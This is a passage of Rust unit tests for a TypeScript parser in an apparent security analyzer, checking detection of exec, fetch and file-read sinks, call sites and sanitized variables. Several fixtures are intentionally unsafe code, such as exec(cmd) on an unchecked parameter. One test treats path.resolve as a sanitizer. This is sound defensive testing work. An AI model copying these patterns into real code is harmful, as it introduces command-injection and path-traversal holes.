1105    );
1106    return resp.json();
1107}
1108"#;
1109        let parsed = TypeScriptParser
1110            .parse_file(Path::new("test.ts"), code)
1111            .unwrap();
1112        assert_eq!(parsed.network_operations.len(), 1);
1113        assert!(matches!(
1114            parsed.network_operations[0].url_arg,
1115            ArgumentSource::Parameter { .. }
1116        ));
1117    }
1118
1119    #[cfg(feature = "typescript")]
1120    #[test]
1121    fn detects_nested_callback_exec() {
1122        let code = r#"
1123function runCommand(command: string): Promise<string> {
1124    return new Promise((resolve, reject) => {
1125        exec(command, (error, stdout) => {
1126            if (error) reject(error);
1127            resolve(stdout);
1128        });
1129    });
1130}
1131"#;
1132        let parsed = TypeScriptParser
1133            .parse_file(Path::new("test.ts"), code)
1134            .unwrap();
1135        assert_eq!(parsed.commands.len(), 1);
1136        assert!(matches!(
1137            parsed.commands[0].command_arg,
1138            ArgumentSource::Parameter { .. }
1139        ));
1140    }
1141
1142    #[cfg(feature = "typescript")]
1143    #[test]
1144    fn accurate_line_numbers() {
1145        let code = r#"
1146// line 2
1147// line 3
1148function dangerous(cmd: string) {
1149    exec(cmd);
1150}
1151"#;
1152        let parsed = TypeScriptParser
1153            .parse_file(Path::new("test.ts"), code)
1154            .unwrap();
1155        assert_eq!(parsed.commands.len(), 1);
1156        // exec(cmd) is on line 5
1157        assert_eq!(parsed.commands[0].location.line, 5);
1158    }
1159
1160    #[cfg(feature = "typescript")]
1161    #[test]
1162    fn handles_tsx_file() {
1163        let code = r#"
1164import React from "react";
1165
1166const Component = ({ url }: { url: string }) => {
1167    const data = fetch(url);
1168    return <div>{data}</div>;
1169};
1170"#;
1171        let parsed = TypeScriptParser
1172            .parse_file(Path::new("component.tsx"), code)
1173            .unwrap();
1174        assert_eq!(parsed.network_operations.len(), 1);
1175        assert!(matches!(
1176            parsed.network_operations[0].url_arg,
1177            ArgumentSource::Parameter { .. }
1178        ));
1179    }
1180
1181    // ── Cross-file support tests ──
1182
1183    #[test]
1184    fn extracts_function_defs() {
1185        let code = r#"
1186export async function readFileContent(filePath: string) {
1187    return fs.readFile(filePath, "utf-8");
1188}
1189
1190function internalHelper(x: number) {
1191    return x + 1;
1192}
1193"#;
1194        let parsed = TypeScriptParser
1195            .parse_file(Path::new("lib.ts"), code)
1196            .unwrap();
1197        assert!(parsed.function_defs.len() >= 2);
1198        let exported = parsed
1199            .function_defs
1200            .iter()
1201            .find(|d| d.name == "readFileContent");
1202        assert!(exported.is_some());
1203        assert!(exported.unwrap().is_exported);
1204        assert_eq!(exported.unwrap().params, vec!["filePath"]);
1205
1206        let internal = parsed
1207            .function_defs
1208            .iter()
1209            .find(|d| d.name == "internalHelper");
1210        assert!(internal.is_some());
1211        assert!(!internal.unwrap().is_exported);
1212    }
1213
1214    #[test]
1215    fn extracts_call_sites() {
1216        let code = r#"
1217async function handler(args: any) {
1218    const validPath = await validatePath(args.path);
1219    const content = await readFileContent(validPath);
1220    return content;
1221}
1222"#;
1223        let parsed = TypeScriptParser
1224            .parse_file(Path::new("index.ts"), code)
1225            .unwrap();
1226        assert!(!parsed.call_sites.is_empty());
1227        let rfc_call = parsed
1228            .call_sites
1229            .iter()
1230            .find(|cs| cs.callee == "readFileContent");
1231        assert!(rfc_call.is_some(), "Should find readFileContent call site");
1232    }
1233
1234    #[test]
1235    fn detects_sanitizer_assignment() {
1236        let code = r#"
1237async function handler(args: any) {
1238    const validPath = await validatePath(args.path);
1239    const content = await readFileContent(validPath);
1240    return content;
1241}
1242"#;
1243        let parsed = TypeScriptParser
1244            .parse_file(Path::new("index.ts"), code)
1245            .unwrap();
1246        assert!(parsed.sanitized_vars.contains("validPath"));
1247
1248        // The call to readFileContent(validPath) should classify validPath as Sanitized
1249        let rfc_call = parsed
1250            .call_sites
1251            .iter()
1252            .find(|cs| cs.callee == "readFileContent");
1253        assert!(rfc_call.is_some());
1254        let rfc = rfc_call.unwrap();
1255        assert!(!rfc.arguments.is_empty());
1256        assert!(
1257            matches!(&rfc.arguments[0], ArgumentSource::Sanitized { .. }),
1258            "validPath should be classified as Sanitized, got: {:?}",
1259            rfc.arguments[0]
1260        );
1261    }
1262
1263    #[test]
1264    fn sanitized_var_from_path_resolve() {
1265        let code = r#"
1266function processFile(rawPath: string) {
1267    const safePath = path.resolve(rawPath);
1268    fs.readFileSync(safePath, "utf-8");
1269}
1270"#;
1271        let parsed = TypeScriptParser
1272            .parse_file(Path::new("test.ts"), code)
1273            .unwrap();
1274        assert!(parsed.sanitized_vars.contains("safePath"));
1275    }
1276}